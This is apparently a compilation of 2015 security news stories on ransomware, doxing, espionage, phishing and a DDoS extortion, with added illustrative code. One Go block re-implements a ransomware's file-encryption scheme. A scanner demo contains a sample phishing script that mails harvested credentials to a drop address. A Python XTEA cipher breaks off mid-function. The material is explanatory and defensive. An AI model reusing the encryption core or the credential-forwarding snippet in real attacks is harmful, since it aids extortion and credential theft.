“First, Linux.Encoder.1 encrypts all files in home directories and directories related to website administration. Then the Trojan recursively traverses the whole file system starting with the directory from which it is launched; next time, starting with a root directory (“/”). At that, the Trojan encrypts only files with specified extensions and only if a directory name starts with one of the strings indicated by cybercriminals.” continues the post.
“To encrypt each file, the Trojan generates an AES key. After files are encrypted using AES-CBC-128, they are appended with the .encrypted extension. Into every directory that contains encrypted files, the Trojan plants a README_FOR_DECRYPT.txt file with a ransom demand,” Dr. Web explained.

To recover the encrypted files, victims are asked to pay one Bitcoin (roughly $380 at today’s rate); once the ransom is paid, the files are decrypted with the private RSA key, which unwraps the AES key stored with each encrypted file.
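The key handling Dr. Web describes is ordinary envelope (hybrid) encryption, and it is the reason the private RSA key in the attackers' hands is the only way back. The following Go program is an illustration added here, not code from Linux.Encoder.1 or Doctor Web: it implements that scheme on in-memory byte slices, with a fresh AES-128 key per file, AES-CBC over the content and the AES key wrapped under an RSA public key, together with the decryption path that the buyer of the one-Bitcoin decryptor receives. The blob layout, PKCS#7 padding and RSA-OAEP with SHA-256 are assumptions; the analysis does not specify them. The lesson for defenders is that with sound random key generation such files are unrecoverable without the private key, which is why offline backups matter more than any decryptor.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// PKCS#7 padding brings data to whole AES blocks, which CBC needs. The Dr. Web
// write-up does not say which padding the Trojan uses; PKCS#7 is an assumption.
func pkcs7Pad(data []byte, bs int) []byte {
	n := bs - len(data)%bs
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(data []byte, bs int) ([]byte, error) {
	if len(data) == 0 || len(data)%bs != 0 {
		return nil, errors.New("bad padded length")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > bs || !bytes.Equal(data[len(data)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return data[:len(data)-n], nil
}

// EncryptFile follows the scheme described above: a fresh 128-bit AES key per
// file, AES-CBC over the content, and the AES key wrapped with the attacker's
// RSA public key. Blob layout (assumption): 2-byte wrapped-key length ||
// wrapped key || IV || ciphertext.
func EncryptFile(pub *rsa.PublicKey, plaintext []byte) ([]byte, error) {
	key := make([]byte, 16) // AES-128, matching "AES-CBC-128" in the analysis
	iv := make([]byte, aes.BlockSize)
	for _, b := range [][]byte{key, iv} {
		if _, err := rand.Read(b); err != nil {
			return nil, err
		}
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plaintext, aes.BlockSize)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	// Only the holder of the matching private key can recover this AES key.
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return nil, err
	}
	out := []byte{byte(len(wrapped) >> 8), byte(len(wrapped))}
	out = append(out, wrapped...)
	out = append(out, iv...)
	return append(out, ct...), nil
}

// DecryptFile is what the decryptor sold for one Bitcoin has to do: unwrap the
// per-file AES key with the RSA private key, then undo AES-CBC.
func DecryptFile(priv *rsa.PrivateKey, blob []byte) ([]byte, error) {
	if len(blob) < 2 {
		return nil, errors.New("truncated blob")
	}
	wl := int(blob[0])<<8 | int(blob[1])
	if len(blob) < 2+wl+aes.BlockSize {
		return nil, errors.New("truncated blob")
	}
	wrapped, iv, ct := blob[2:2+wl], blob[2+wl:2+wl+aes.BlockSize], blob[2+wl+aes.BlockSize:]
	if len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext not block aligned")
	}
	key, err := rsa.DecryptOAEP(sha256.New(), nil, priv, wrapped, nil)
	if err != nil {
		return nil, err // a wrong private key fails here
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(padded, ct)
	return pkcs7Unpad(padded, aes.BlockSize)
}

func main() {
	priv, _ := rsa.GenerateKey(rand.Reader, 2048) // stands in for the attackers' key pair
	sample := []byte("<?php echo 'constructed sample of a web file'; ?>")
	blob, _ := EncryptFile(&priv.PublicKey, sample)
	pt, err := DecryptFile(priv, blob)
	fmt.Printf("%d-byte blob, recovered %q, err=%v\n", len(blob), pt, err)
}
```

Every encrypted file carries its own wrapped key, so compromising one AES key recovers one file only; everything hinges on the single RSA private key the attackers never ship.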

Cracka hackers doxed more than 2,000 Government employees

The Cracka hackers who took over the personal email account of CIA Director John Brennan have now doxed more than 2,000 government employees.
The young hackers of the crew known as Crackas With Attitude (CWA) announced that they have doxed more than 2,000 government employees.

The hackers are the same ones who accessed the AOL email account of the CIA director and broke into the email account of the FBI Deputy Director’s wife.

Now the hackers claim to have broken into government computers: on Thursday the official Twitter account of the Cracka group published a list of more than 2,000 names, phone numbers and email addresses of law enforcement and military personnel.


Cracka claimed to have broken into government systems and leaked the data of government employees in support of Palestine.

“Maybe the USgov should listen to us, I mean, we have enough information to make them look like the little bitches they are,” Cracka said in a tweet.

How did Cracka obtain the information?

Members of the group explained to Motherboard that they took over the account of an internal employee and then gained access to several “tools feds use”, such as JABS, a database holding information on arrested people; IC3, the crime-reporting tool used by the FBI; and VCC, a sharing tool for law enforcement agencies.

Wired reported that the hackers exploited a flaw to gain access to the private portal.

“The CWA hackers said they found a vulnerability that allowed them to gain access to the private portal, which is supposed to be available only to the FBI and other law enforcement agencies around the country. That portal in turn, they say, gave them access to more than a dozen law enforcement tools that are used for information sharing.” states Wired.

Cracka did not provide details about the hacked account, saying only that the employee is “high in the [government].” The hackers confirmed that they did not download all the data available.

“We let the [government] off by a lot, this could be so damaging it could affect the whole of USA by ALOT,” the hacker explained via online chat.

Cracka also published a tweet claiming to have stolen “34,000 lines of emails, names, position and phone numbers of gov associates, including military.”

As Cracka correctly pointed out, this kind of data breach could have serious consequences for homeland security: personal information on government personnel could be used by foreign state-sponsored hackers in cyber espionage operations, for instance as a starting point for targeted phishing.

“Just to clear this up, CWA did, indeed, have access to everybody in USA’s private information, now imagine if we was [sic] Russia or China,” he said in another tweet.

Journalists at Motherboard confirmed that at least five randomly chosen numbers from the list they analyzed are legitimate.

The German Intelligence Systematically Spied on Allies

Der Spiegel reported that the German intelligence agency BND “systematically spied” on its allies and on several international organizations.
In recent months, German officials have accused the NSA of spying on members of the government, including Chancellor Angela Merkel.

In October, the German authorities launched a probe into allegations of a new case of US espionage after finding a laptop infected with the Regin spyware.

The German Parliament also suffered numerous cyber attacks that spread a highly sophisticated malware inside the Bundestag network; investigators suspect the involvement of nation-state actors, likely Russian state-sponsored hackers.

Victims or victimizers?

The BND had already been accused of spying on officials at the French foreign ministry and presidency, as well as at the European Commission; the German spies allegedly operated on behalf of the NSA.

In April 2015, Der Spiegel revealed that the BND had helped the NSA monitor European politicians.

“At least since 2008, BND employees noticed several times that some of these selectors ran contrary to the mission profile of the German foreign intelligence service and were not covered by the “Memorandum of Agreement” that the Germans and the Americans had negotiated in 2002 to jointly combat global terrorism. Instead, the NSA was looking for specific information about the defense group EADS, Eurocopter and French authorities. The BND, however, did not take this as an opportunity to review the selector list systematically.

Only after the unveiling of the NSA scandal in the summer of 2013 did a BND department deal specifically with the NSA search terms.” states Der Spiegel.

Now RBB Radio and Spiegel Online claim that the BND also conducted espionage on its own account against several embassies and administrations of “European states and allies”.

“the BND had systematically spied on ‘allies’ across the world, including on the interior ministries of the United States, Poland, Austria, Denmark and Croatia.” states Der Spiegel.
According to Der Spiegel, the German secret service spied on the US delegation to the European Union in Brussels and to the UN in New York, the US Treasury, and several embassies in Germany, including those of the US, France, Britain, Sweden, Portugal, Greece, Spain, Italy, Switzerland, Austria and the Vatican.

The German intelligence service appears very active: the BND also spied on the Geneva-based International Committee of the Red Cross and on Oxfam.

The only certainty is that every government currently conducts covert operations in cyberspace to gather intelligence and to spy on allies and adversaries alike.

Cybercriminals have a new trick for spreading extortion viruses

6 Nov 2015 Viruses
Fraudulent emails in which cybercriminals threaten recipients with the suspension of their domain have begun to spread across the internet like the plague. In reality, the attackers are trying to smuggle an uninvited guest onto the computer, which they then use to extort the victim. The Czech national security team CSIRT warned of the new threat.
“In recent days, a phishing campaign targeting domain holders has been running abroad. The email that domain holders received contained information about an alleged suspension of their domain for violating their registrar's policy,” said analyst Pavel Bašta from the CSIRT team, which is operated by the CZ.NIC association.

The risk lies in the fraudulent links in the messages. “According to our information, the links in the emails lead to a ransomware download,” Bašta added.

Ransomware appears on the internet in various forms. It is malicious code that can encrypt the data on a hard disk and demands a ransom for restoring it. Given that the pirates usually demand about 100 dollars (2,000 CZK) to unlock a single computer, the “ransom” collected can reach several hundred thousand crowns per day.

Do not pay the ransom
Moreover, even after paying the ransom, users have no guarantee that they will actually get their data back. The virus must be removed from the computer and the data then decrypted with a special program. [full report]

“It cannot be ruled out that a similar scam will appear in the Czech Republic in the future. We therefore recommend that domain holders proceed with caution if they receive any suspicious message,” Bašta concluded, adding that increased vigilance is advisable for domestic users as well.

Cyber attacks cost companies 315 billion dollars over the past year

6 Nov 2015 Analyses
Cyber attacks have cost companies 315 billion dollars worldwide over the past 12 months, and one in six businesses was attacked. Despite widely reported security breaches and increasingly frequent hacker attacks, almost half of companies continue to expose themselves to risk by having no comprehensive strategy for preventing digital crime. This follows from a study by Grant Thornton.
In the Czech Republic, an attack on personal data databases is more likely than a cyber attack on strategic infrastructure.
Businesses in the EU recorded losses of around 62 billion dollars, in Asia-Pacific 81 billion and in North America 61 billion USD. The average cyber attack costs a business 1.2 percent of its revenue. The financial sector feels the most threatened.

“Cyber attacks are an increasingly significant danger to business. It is not only about costs in the financial sense, but also about serious damage to a company's reputation, as happened in the case of the Ashley Madison web portal, from which hackers managed to steal 36 million emails,” said Grant Thornton Advisory partner David Pirner.

According to Pirner, the banking sector is relatively well prepared: it knows what to prepare for, and banks are under fire from hackers every day. Czech banks were apparently among the victims of last year's attack by the international Carbanak group, which obtained more than 20 billion crowns worldwide through a series of intrusions.

According to experts, a massive cyber attack like the one that recently hit the British operator TalkTalk, which may have led to the theft of personal data of all of its more than four million customers, is not likely in the Czech Republic; if anything, such an attack would rather target one of the virtual operators. “Large mobile operators do not use different security systems than other large companies and do not skimp on security. The situation may be different for low-cost operators,” said Karel Miko, a computer security specialist at DCIT.

Financial Reporting Council of Nigeria site used for phishing scam

According to Netcraft, the website of the Financial Reporting Council of Nigeria is being used to serve a webmail phishing site from the agency's legitimate domain.
The website of the Financial Reporting Council of Nigeria was used by cyber criminals in a phishing scam: according to the experts at Netcraft, the agency's legitimate site serves a webmail phishing page.

The attack is not complex; the crooks used a common phishing kit that makes it easy to create customised phishing pages.

“The phishing content is based on a ready-to-go phishing kit that is distributed as a zip file. It contains easily-customisable PHP scripts and images designed to trick victims into surrendering either their Yahoo, Gmail, Hotmail or AOL passwords.” states the report.

The hackers likely compromised the government website and deployed the phishing page into an images directory on it. The experts also noticed that the site runs Joomla 2.5.28, an old version of the CMS that is no longer supported.

The phishing page asks for the user's email credentials and for the phone number used as a backup login credential for Gmail. Once the victim enters the information, it is transmitted by email directly to the cyber criminals. The phishing page then redirects the victim’s browser to the Saatchi Art investment website at http://explore.saatchiart.com/invest-in-art/, which, the experts clarified, is not involved in the scam.

“After a victim enters his or her email credentials into the phishing site, both the username and password are transmitted via email directly to the fraudster. These emails also contain the victim’s IP address, and a third-party web service is used to deduce which country the victim is in.” continues the post published by Netcraft.


The experts at Netcraft explained that this phishing scam is unusual because the attackers seem more interested in collecting credentials that users reuse across several web services than in the victims’ banking logins.

Netcraft reported that the majority of Nigeria’s government websites, including the one operated by the Financial Reporting Council, are hosted in the United States. They speculate that the attacker exploited a flaw in the Joomla! CMS to deploy the phishing kit.
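What Netcraft describes gives a web administrator a concrete triage signature: server-side scripts and archives dropped into a static directory such as images/, scripts that read posted credentials and forward them with mail(), and pages that geolocate the visitor and then redirect elsewhere. The following Go scanner is an editor's illustration added here, not Netcraft's tooling: it applies those heuristics to a webroot supplied as an fs.FS. The in-memory Joomla-like tree in SampleWebroot and the kit file it contains are constructed for the demo, and the list of static directories is an assumption that a site with custom extensions may need to adjust. Against a real install, pass os.DirFS("/var/www/site") instead of the sample.

```go
package main

import (
	"fmt"
	"io/fs"
	"path"
	"regexp"
	"strings"
	"testing/fstest"
)

// Finding records one suspicious file and every reason it was flagged.
type Finding struct {
	Path    string
	Reasons []string
}

var (
	// Top-level directories that should hold static assets only on a stock
	// Joomla install (assumption; site-specific extensions may differ).
	staticDirs = map[string]bool{"images": true, "media": true, "cache": true, "tmp": true, "logs": true}
	// Traits of the kit Netcraft describes: posted credentials mailed to the
	// fraudster, the visitor's IP looked up, and a redirect afterwards.
	postCreds = regexp.MustCompile(`\$_POST\s*\[\s*['"](?:pass|passwd|password|email|login|user)\w*['"]\s*\]`)
	mailCall  = regexp.MustCompile(`\bmail\s*\(`)
	geoLookup = regexp.MustCompile(`(?i)geoip|ipinfo|ip-api|REMOTE_ADDR`)
	redirect  = regexp.MustCompile(`(?i)header\s*\(\s*['"]Location:`)
)

// ScanWebroot walks root and returns the files that look like a planted kit.
func ScanWebroot(root fs.FS) ([]Finding, error) {
	var findings []Finding
	err := fs.WalkDir(root, ".", func(p string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() {
			return err
		}
		ext := strings.ToLower(path.Ext(p))
		top := strings.SplitN(p, "/", 2)[0]
		isScript := ext == ".php" || ext == ".phtml" || ext == ".php5"
		var reasons []string
		if isScript && staticDirs[top] {
			reasons = append(reasons, "server-side script in static directory "+top+"/")
		}
		if ext == ".zip" && staticDirs[top] {
			reasons = append(reasons, "archive (possible kit) in static directory "+top+"/")
		}
		if isScript {
			src, err := fs.ReadFile(root, p)
			if err != nil {
				return err
			}
			if postCreds.Match(src) && mailCall.Match(src) {
				reasons = append(reasons, "reads posted credentials and calls mail()")
			}
			if geoLookup.Match(src) && redirect.Match(src) {
				reasons = append(reasons, "geolocates visitor and redirects")
			}
		}
		if len(reasons) > 0 {
			findings = append(findings, Finding{Path: p, Reasons: reasons})
		}
		return nil
	})
	return findings, err
}

// SampleWebroot is a constructed in-memory tree used for the demo; the "kit"
// is illustrative and is not Netcraft's sample.
func SampleWebroot() fs.FS {
	kit := `<?php
$user = $_POST['email']; $pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
mail("drop@example.invalid", "New login", "$user:$pass from $ip");
header("Location: http://explore.saatchiart.com/invest-in-art/");
`
	return fstest.MapFS{
		"index.php":                         {Data: []byte("<?php define('_JEXEC', 1); require 'includes/app.php';")},
		"images/logo.png":                   {Data: []byte{0x89, 'P', 'N', 'G'}},
		"images/webmail/login.php":          {Data: []byte(kit)},
		"images/webmail/kit.zip":            {Data: []byte("PK\x03\x04")},
		"components/com_content/helper.php": {Data: []byte("<?php function fmt($s){return htmlspecialchars($s);}")},
	}
}

func main() {
	findings, err := ScanWebroot(SampleWebroot())
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s: %s\n", f.Path, strings.Join(f.Reasons, "; "))
	}
}
```

The heuristics are deliberately narrow so that a legitimate component under components/ is not flagged; a file that trips the static-directory rule alone still deserves a look, since on an unsupported Joomla 2.5 install that is the most common sign of a web shell or kit.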

ProtonMail Paid Hackers $6000 Ransom in Bitcoin to Stop DDoS Attacks

The Geneva-based encrypted email service ProtonMail was forced to pay a ransom of almost $6,000 to stop sustained distributed denial-of-service (DDoS) attacks that had knocked its service offline since Tuesday.
ProtonMail, an end-to-end encrypted email service launched last year, has been dealing with what it called an extremely powerful DDoS attack, and was still unavailable at the time of writing.
ProtonMail Paid $6,000 to Stop DDoS
In an official statement posted on a WordPress blog on Thursday, ProtonMail said that the powerful DDoS attack by an unknown group of hackers forced it to pay 15 Bitcoins (about $5,850) in exchange for halting the assault.
However, even after the ransom was paid, the crippling DDoS attacks against the ProtonMail service continued.
DDoS Attack Continues Even After Paying Ransom
ProtonMail officials said, "We hoped that by paying [ransom], we could spare other companies impacted by the [DDoS] attack against us, but the attack continued nevertheless."
"Attacks against [key] infrastructure continued throughout the evening and to keep other customers online, our ISP [Internet Service Provider] was forced to stop announcing our IP range, effectively taking us offline."
Scary, Large-Scale DDoS attack
However, the criminals who had extorted ProtonMail did not take responsibility for the second DDoS attack, which, according to the company, was more “scary” and “a full-scale infrastructure attack.”
"This coordinated assault on [our] key infrastructure eventually managed to bring down both the ISP and the datacenter, which impacted hundreds of other companies, not just ProtonMail," the company wrote.
Although the motive behind the attack is still unclear, ProtonMail promises that it is working hard to restore service to its users.
Customers' Data Unaffected
The company is working with security officials at its Switzerland-based data center and with others around the world to get the situation under control.
On its official Twitter account, ProtonMail reassured customers that their data is "secure and untouched," though access to the site remains unlikely for now, before confirming on Thursday that the service was under a second DDoS attack.
ProtonMail offers an end-to-end encrypted webmail system designed by CERN scientists to defeat snooping by intelligence agencies such as the NSA. Since its launch, the service has gained over 500,000 users worldwide.

FBI Deputy Director's Email Hacked by Teenager Who Hacked CIA Chief

The same group of teenage hackers that hacked the AOL email account of CIA director John Brennan two weeks ago has now hacked into the AOL email accounts of FBI Deputy Director Mark Giuliano and his wife.
Yesterday, Cracka, a member of the teenage hacktivist group known as 'Crackas With Attitude' (CWA), posted online a new trove of information belonging to thousands of government employees; however, the group claims to have accessed far more than that.
The hackers claimed to have obtained the personal information by hacking into the AOL email accounts of Giuliano and his wife.
More Than 3,500 Government Employees Doxxed
The published information includes more than 3,500 names, email addresses and contact numbers of law enforcement and military personnel.
Though FBI officials could not immediately verify the claims, Infowars confirmed the authenticity of several people listed, ranging from local police officers to FBI and military intelligence analysts.
Following the CIA director's email hack, Giuliano made aggressive statements about catching the hackers and making an example of CWA.
The CWA hacking group got angry over Giuliano's statement and set out to teach him a lesson by hacking his personal email account.
Cracka's Twitter account was temporarily deleted, but before it was deactivated by Twitter on Thursday evening, Cracka claimed to have leaked the information in support of Palestine.
Hacker Made Phone Call to FBI Deputy Director
Motherboard spoke to the hackers, who claimed they have access to a lot more than the information they shared on Thursday.
However, the FBI declined to comment on whether Mark Giuliano was hacked, although Cracka said the group found the deputy director's phone number in the email account’s contact list.
The hacker also claimed to have called the number. "I called it and asked for Mark, and he is like 'I don't know you, but you better watch your back', and then he hung up, and I kept calling and he was getting mad then he didn't pick up," Cracka said.

ProtonMail paid a $6000 Ransom to stop DDoS Attacks

ProtonMail has paid a $6,000 ransom to stop prolonged DDoS attacks that have kept its services offline since Tuesday. Unfortunately, the attacks are continuing.
The popular encrypted email service ProtonMail has suffered a prolonged, major DDoS attack that has kept it offline since Tuesday. It was an extortion attempt: the attackers demanded a ransom to stop the DDoS attack on the company's services.

The company decided to pay a ransom of almost $6,000 to stop the sustained DDoS attacks; at the time of writing, the ProtonMail service is still down.

The news of ProtonMail's decision to pay the ransom was published in an official statement posted on the protonmaildotcom.wordpress.com blog on Thursday.

“As many of you know, ProtonMail came under sustained DDOS attack starting on November 3rd, 2015. At the current moment, we are not under attack and have been able to restore services, but we may come under attack again.” states the post.


ProtonMail's representatives explained that the company was the victim of a powerful DDoS attack by an unknown group of hackers who demanded 15 Bitcoins (about $5,850) in exchange for stopping the attacks.

The hackers requested the payment of 15 Bitcoin to the address “1FxHcZzW3z9NRSUnQ9Pcp58ddYaSuN1T2y.” Below is the transaction history associated with this address used by the crooks.

protonmail ransom bitcoin

The real problem is that the DDoS attacks continued even after the company paid the ransom, and the attackers’ motivation is still unclear.

“We hoped that by paying [ransom], we could spare other companies impacted by the [DDoS] attack against us, but the attack continued nevertheless.” “Attacks against [key] infrastructure continued throughout the evening and to keep other customers online, our ISP [Internet Service Provider] was forced to stop announcing our IP range, effectively taking us offline.”
“This coordinated assault on [our] key infrastructure eventually managed to bring down both the ISP and the datacenter, which impacted hundreds of other companies, not just ProtonMail,” the company wrote.
ProtonMail is working to restore service and is supporting the investigation conducted by the Swiss Governmental Computer Emergency Response Team (GovCERT), the Cybercrime Coordination Unit Switzerland (CYCO), and Europol.

Below is the description of the attack provided by ProtonMail:

“Slightly before midnight on November 3rd, 2015, we received a blackmail email from a group of criminals who have been responsible for a string of DDOS attacks which have happened across Switzerland in the past few weeks. This threat was followed by a DDOS attack which took us offline for approximately 15 minutes. We did not receive the next attack until approximately 11AM the next morning. At this point, our datacenter and their upstream provider began to take steps to mitigate the attack. However, within the span of a few hours, the attacks began to take on an unprecedented level of sophistication.” states the post. “At around 2PM, the attackers began directly attacking the infrastructure of our upstream providers and the datacenter itself. The coordinated assault on our ISP exceeded 100Gbps and attacked not only the datacenter, but also routers in Zurich, Frankfurt, and other locations where our ISP has nodes. This coordinated assault on key infrastructure eventually managed to bring down both the datacenter and the ISP, which impacted hundreds of other companies, not just ProtonMail.”

The company confirmed that customer data is not affected by the ongoing attacks and is “secure and untouched.”

ProtonMail also explained that its systems are still vulnerable to attacks of this magnitude, but that it is working on a definitive solution to mitigate such events. The problem is that such solutions are very expensive, so the company has asked its users to donate to the ProtonMail Defense Fund.

“At present, ProtonMail’s infrastructure is still vulnerable to attacks of this magnitude, but we have a comprehensive long term solution which is already being implemented. Protecting against a highly sophisticated attack like the second one which was launched against us requires sophisticated solutions as we also need to protect our datacenter and upstream providers. Cost estimates for these solutions are around $100,000 per year since there are few service providers able to fight off an attack of this size and sophistication”

The practice of hitting companies with sustained DDoS attacks for extortion is quite common: according to a report published by Akamai in September, the DD4BC criminal group was responsible for at least 114 DDoS attacks on Akamai's customers.

Avast launches the 2016 editions of its security solutions

6 Nov 2015 Protection
Avast has announced new security solutions for PCs and mobile devices. The 2016 version for PC brings, among other things, a multi-platform solution called Avast Passwords (Hesla Avast), which helps users get a better grip on protecting their personal information.

Avast 2016 also brings faster installation, a simplified user interface and full compatibility with Windows 10.

Avast Passwords is a multi-platform solution that synchronizes all passwords across all of a user's devices, including Android and iOS devices; it can also check the strength of the passwords in use and delete all passwords stored in the web browser.

Avast Passwords can also alert users that their credentials have been exposed in a data leak.

What's new in Avast 2016 for PC, according to the vendor:

Avast Passwords: this password manager automatically generates strong passwords that users do not need to remember; users set and remember only one master password, which gives them access to all the others. It is available in all versions of Avast 2016 for PC, Android and iOS and, according to the vendor, will soon be available for Mac as well.

SafeZone browser: isolates all websites related to online shopping, bank transfers and financial operations in a “protected space”, in which it also opens any suspicious websites. SafeZone also works as a browser extension that not only blocks unwanted ads (thanks to a built-in ad blocker) but also speeds up page loading. Another function of the extension, called Do-Not-Track, lets users find out which companies track their behaviour on the internet and decide which of them to allow and which not. SafeZone is part of the premium versions of the Avast 2016 products.
Improved Home Network Security: this feature now detects 12 additional types of home router vulnerabilities. With one click it checks the entire home network, including printers, network drives and the router.

Anonymous Group Leaks Identities of 1000 KKK Members

The online hacktivist group Anonymous has followed through on its promise to disclose the identities of hundreds of Ku Klux Klan members.
On Monday, Anonymous vowed to release a full dump of information on about 1,000 alleged Ku Klux Klan members, choosing 5 November as the date.
As promised, Anonymous posted a link to a Pastebin page with the names, aliases, Google Plus profiles, Facebook accounts and other identifying information of roughly 1,000 individuals the group believes are members of the Ku Klux Klan.
The hackers behind the leak tweeted the Pastebin link from a Twitter account, Operation KKK (@Operation_KKK), believed to be controlled by them.
The Ku Klux Klan (KKK) is classified as a white supremacist racist group by the Anti-Defamation League and the Southern Poverty Law Center, and is estimated to have 5,000 to 8,000 members in total.
"We hope Operation KKK will, in part, spark a bit of constructive dialogue about race, racism, racial terror and freedom of expression, across group lines. Public discourse about these topics can be honest, messy, snarky, offensive, humbling, infuriating, productive, and serious all at once," Anonymous wrote in the Pastebin post.
"The reality is that racism usually does NOT wear a hood, but it does permeate our culture on every level. Part of the reason we have taken the hoods off of these individuals is not because of their identities, but because of what their hoods symbolize to us in our broader society."
Anonymous also notes that it collected the information on KKK members over 11 months through public documents, "digital espionage," interviews with experts and the social media accounts of KKK affiliates.
However, beyond those identifiers the group has not published any further personal information about the listed individuals.

OmniRat RAT is currently being used by criminals in the wild

Researchers at Avast have published an analysis of OmniRAT, a multi-platform remote administration tool (RAT) that has been used by criminals in the wild.
Researchers at Avast have conducted a brief analysis of OmniRAT, a multi-platform remote administration tool (RAT) that is being used for malicious purposes.

The Avast analysis covers OmniRAT, a remote administration tool that works on Android, Windows, Linux and Mac OS X.

It is very popular and cheap: OmniRAT lifetime licenses for servers and clients are offered for $25 and $50, and the operators also offer lifetime support.

Although OmniRAT is not designed for illicit purposes, the experts at Avast have observed many crooks using it as a remote access Trojan.

The attackers spread the RAT via social engineering. A German user explained that his Android device was infected via an SMS containing a shortened URL pointing to a website where the victim was instructed to enter a code and their phone number. The SMS claimed that the victim had received an MMS that could not be delivered because the phone was affected by the Android Stagefright vulnerability.

Once the victim provides the requested information, the website serves an APK that, when installed, shows an icon labeled “MMS Retrieve”. Tapping that icon is then enough to start the installation of OmniRAT.


“A custom version of OmniRat is currently being spread via social engineering. A user on a German tech forum, Techboard-online, describes how a RAT was spread to his Android device via SMS. After researching the incident, I have come to the conclusion that a variant of OmniRat is being used,” reads the blog post published by Avast.

The malware analyst Nikolaos Chrysaidos from Avast explained that once criminals have infected a mobile device they can access its contact list in order to spread OmniRat further.

“The victim then has no idea their device is being controlled by someone else and that every move they make on the device is being recorded and sent back to a foreign server,” Chrysaidos said. “Furthermore, once cybercriminals have control over a device’s contact list, they can easily spread the malware to more people. Inside this variant of OmniRat, there is a function to send multiple SMS messages. What makes this especially dangerous is that the SMS spread via OmniRat from the infected device will appear to be from a known and trusted contact of the recipients, making them more likely to follow the link and infect their own device.”

OmniRat is quite similar to another RAT, DroidJack, which has been used by several groups in the criminal underground for illegal activities. OmniRat is cheaper than DroidJack, which is offered for sale at nearly $210.

Mabouia: The first ransomware in the world targeting MAC OS X


Rafael Salema Marques, a Brazilian researcher, published a PoC about the existence of Mabouia ransomware, the first ransomware that targets MAC OS X.
Imagine this scenario: You received a ransom warning on your computer stating that all your personal files had been locked. In order to unlock the files, you would have to pay $500.

This is the usual modus operandi of ransomware (ransom + software).

Ransomware encrypts files in a way that is practically impossible to reverse with the computing means available to ordinary users. The only way to decrypt the files is to pay the malware creator to obtain the password that unlocks them… which is exactly what most victims do when the files being held hostage are important to them.

The definition of ransomware according to Wikipedia is as follows: “type of malware that restricts access to a computer system that it infects in some ways, and demands that the user pay a ransom to the operators of the malware to remove the restriction.” There are several active ransomware families in the world today, but none had ever been designed to target Mac OS X until yesterday.


Rafael Salema Marques (@pegabizu), a Brazilian Cybersecurity Researcher, published yesterday a proof of concept about the existence of Mabouia ransomware, the first ransomware that targets MAC OS X.

The researcher’s goal is to alert the 66 million Mac OS X users and dispel the myth that there is no malware aimed at Apple’s personal computers.

The creator of the malicious code also notes that Mac users are a good target for ransomware, because they generally have higher purchasing power and use the computer in a superficial way, usually for editing images and text.

The malware name Mabouia refers to a kind of lizard endemic to the island of Fernando de Noronha, Brazil. It is coded in C++ and uses the XTEA cryptographic algorithm with 32 rounds to encrypt the user’s files. Furthermore, it does not need superuser privileges to run, since the ransomware only modifies the user’s personal files. Thus infection occurs with just one click.
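To make the "XTEA with 32 rounds" detail concrete, the following is an added example (not the Mabouia PoC's own code) implementing the XTEA block cipher with the reference 32-cycle schedule, plus a CBC wrapper in the shape a file encryptor would use. The CBC mode, PKCS#7-style padding and big-endian word order are assumptions; the write-up only names the algorithm and round count.

```python
"""XTEA (32 cycles) plus a CBC file wrapper: why a user-privilege process is
enough to lock personal files, and why they stay locked without the key.
Added example; not code from the Mabouia write-up."""
import struct

DELTA = 0x9E3779B9
MASK32 = 0xFFFFFFFF
BLOCK = 8  # XTEA: 64-bit blocks, 128-bit key


def xtea_encrypt_block(key: bytes, block: bytes, num_rounds: int = 32) -> bytes:
    """Encrypt one 8-byte block. num_rounds=32 is the reference default (each
    "round" is one Feistel cycle). Big-endian word order is an assumption."""
    k = struct.unpack(">4I", key)
    v0, v1 = struct.unpack(">2I", block)
    s = 0
    for _ in range(num_rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
        s = (s + DELTA) & MASK32
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
    return struct.pack(">2I", v0, v1)


def xtea_decrypt_block(key: bytes, block: bytes, num_rounds: int = 32) -> bytes:
    """Exact inverse of xtea_encrypt_block: same schedule walked backwards."""
    k = struct.unpack(">4I", key)
    v0, v1 = struct.unpack(">2I", block)
    s = (DELTA * num_rounds) & MASK32
    for _ in range(num_rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
        s = (s - DELTA) & MASK32
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
    return struct.pack(">2I", v0, v1)


def _pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding (wrong key or corrupted data)")
    return data[:-n]


def xtea_cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC over XTEA blocks (mode is an assumption, see lead-in)."""
    padded, prev, out = _pad(plaintext), iv, bytearray()
    for i in range(0, len(padded), BLOCK):
        prev = xtea_encrypt_block(key, bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev)))
        out += prev
    return bytes(out)


def xtea_cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    if len(ciphertext) % BLOCK:
        raise ValueError("ciphertext length is not a multiple of the block size")
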